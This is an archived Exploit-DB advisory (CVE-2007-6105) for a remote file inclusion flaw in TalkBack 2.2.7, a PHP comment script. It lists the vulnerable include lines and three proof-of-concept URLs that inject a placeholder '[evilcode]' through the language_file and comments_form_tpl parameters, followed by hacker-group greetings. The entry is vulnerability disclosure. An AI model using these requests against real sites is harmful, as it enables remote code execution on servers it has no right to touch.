- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4640
- Проверка EDB
-
- Пройдено
- Автор
- NOGE
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-6105
- Дата публикации
- 2007-11-21
Код:
==================================================================================================================================
# TalkBack 2.2.7 Remote File Include Vulnerability
Software : TalkBack version 2.2.7
Developer : http://www.scripts.oldguy.us/talkback
Discovered by : NoGe
Contact : pace[dot]noge[at]hotmail[dot]com
==================================================================================================================================
# Vulnerable file
comments-display-tpl.php
line 35 include $language_file;
line 172 include $config['comments_form_tpl'];
addons/separate-comments-mod/my-comments-display-tpl.php
line 35 include $language_file;
# Exploit
http://localhost/path/comments-display-tpl.php?language_file=[evilcode]
http://localhost/path/comments-display-tpl.php?config[comments_form_tpl]=[evilcode]
http://localhost/path/addons/separate-comments-mod/my-comments-display-tpl.php?language_file=[evilcode]
==================================================================================================================================
# Greetz
all crew #papuahacker #baliemhackerlink #nyubicrew
skulmatic olibekas ulga Cungkee nyubi k1tk4t bius SiKodoQ newbie
yooogy H312Y Vrs-hCk Oon_Boy Paman mousekill }^-^{ Fluzy str0ke
http://kapukvalley.net member
==================================================================================================================================
# milw0rm.com [2007-11-21]- Источник
- www.exploit-db.com
